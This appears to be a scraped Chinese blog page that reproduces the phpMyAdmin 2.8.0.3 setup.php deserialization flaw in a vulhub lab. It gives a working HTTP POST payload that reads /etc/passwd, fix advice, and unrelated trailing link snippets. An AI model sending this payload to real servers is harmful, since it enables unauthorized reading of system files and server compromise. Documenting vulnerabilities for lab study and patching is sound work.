WooYun-2016-199433 -phpmyadmin-反序列化-getshell
文章参考
http://www.mottoin.com/detail/521.html
https://www.cnblogs.com/xhds/p/12579425.html
虽然是很老的漏洞,但在内网大部分都是用着老版本,在外网存在的也为数不少
漏洞文件
/scripts/setup.php
影响版本
已知版本为 2.8.0.3
修复建议
尽快升级到最新版 将setup.php中28行中的"configuration"改为传入其他值 直接删除scripts目录,防止被恶意攻击。
环境搭建
https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

复现
1.构造EXP (Linux版)

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
2. 构造EXP (Windows版)

WooYun-2016-199433 -phpmyadmin-反序列化-getshell的更多相关文章
- [0CTF 2016]piapiapia{PHP反序列化漏洞(PHP对象注入)}
		
先上学习链接: https://www.freebuf.com/column/202607.html https://www.cnblogs.com/ichunqiu/p/10484832.html ...
 - phpmyadmin反序列化漏洞(WooYun-2016-199433)
		
简介 环境复现:https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的.基于Web的MySQL数据库管 ...
 - [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
简介 原题复现: 考察知识点:反序列化.数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
 - 【实战】Weblogic反序列化Getshell
		
修仙就是干,直接操作起来 1.访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 2.加入Content-Type:text/xml 3.在body中 ...
 - 【实战】JBOSS反序列化Getshell
		
一.JBOSS4.0.5_GA,5.x,6.x 需要JavaDeserH2HC(https://github.com/joaomatosf/JavaDeserH2HC) 操作起来 javac -cp ...
 - 代码审计-Typecho反序列化getshell
		
0x01 漏洞代码 install.php: <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_c ...
 - jboss  反序列化  getshell
		
获取信息 上传jsp 小马 小马成功 上传大马,大马也成功
 - Getshell Via phpmyadmin SQL Execution In /import.php To Write Evil Webshell File Into Disk
		
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上 ...
 - getshell技巧-phpMyAdmin的利用
		
生活就是泥沙俱下,鲜花和荆棘并存.--毕淑敏 1.明确目标2.信息收集3.漏洞挖掘和利用 信息收集 明确路径 利用目录扫描工具,对目标网站进行扫描,获取网站目录.常用工具有Kali中的DirBuste ...
 - 【漏洞复现】PHPmyadmin 4.8.1后台Getshell新姿势
		
原文地址:https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog 早上看到群里在讨论一个新姿势,phpmyadmin后台getshell,不同于以往需要知道 ...
 
随机推荐
- Codeforces Round #641 div2 B. Orac and Models (DP)
			
题意:有一个长度为\(n\)的序列\(a\),求一个最长上升子序列,且这个子序列的元素在\(a\)中的位置满足\(i_{j+1}modi_{j}=0\),求这个子序列的最大长度. 题意:这题假如我们用 ...
 - python代理池的构建1——代理IP类的构建,以及配置文件、日志文件、requests请求头
			
一.整体结构 二.代理IP类的构建(domain.py文件) ''' 实现_ init_ 方法, 负责初始化,包含如下字段: ip: 代理的IP地址 port:代理IP的端口号 protocol: 代 ...
 - C# 之 dynamic
			
C#中的dynamic用于避免编译时类型检查,编译器在运行时获取类型. dynamic无法使用VisualStudio的intelliSense(智能感知),即调用dynamic修饰的对象的方法或字段 ...
 - 10.PowerShell DSC之细节
			
mof文件到各Node放在哪里了? 在C:\Windows\System32\Configurtion文件夹下: 你可能会注意到mof的文件名称和Pull Server上的不一致,并且多出了几个.不用 ...
 - Zabbix 监控项更多用法
			
监控服务端口状态 配置 Zabbix 提供的检测器 配置自定义值映射 查看监控项数据状态 触发器配置 自定义监控项 TCP 11 种状态 TCP 11 种状态 LISTEN - 侦听来自远方TCP端口 ...
 - MySQL 主从复制(下)
			
延时复制 因为延时复制主从数据同一时间不一致, 所以延时从库一般只能做备份,不提供任何对外服务 配置延时复制(已经有主从) 1.停止主从 mysql> stop slave; Query OK, ...
 - Gym 100796B Wet Boxes(思维)题解
			
题意:给一个如图坐标系,每个方形都放在下面两个中间,已知一个木块湿了那么他下面所有的都会湿,显然,不能湿两次.问,每次给出一个坐标,把他弄湿,有几个木块从干变成湿了. 思路:我们把坐标系拉直,就变成了 ...
 - API & YApi
			
API & YApi 接口管理服务 YApi http://yapi.demo.qunar.com/ https://ued.qunar.com/ build bug https://gith ...
 - Node.js & 页面截图 & 生成画报
			
Node.js & 页面截图 & 生成画报 https://zzk.cnblogs.com/my/s/blogpost-p?Keywords=headless solution 使用 ...
 - py pandas
			
import pandas as pd class Main(): def __init__(self): # 读取excel self.df = pd.read_excel("C:\\Us ...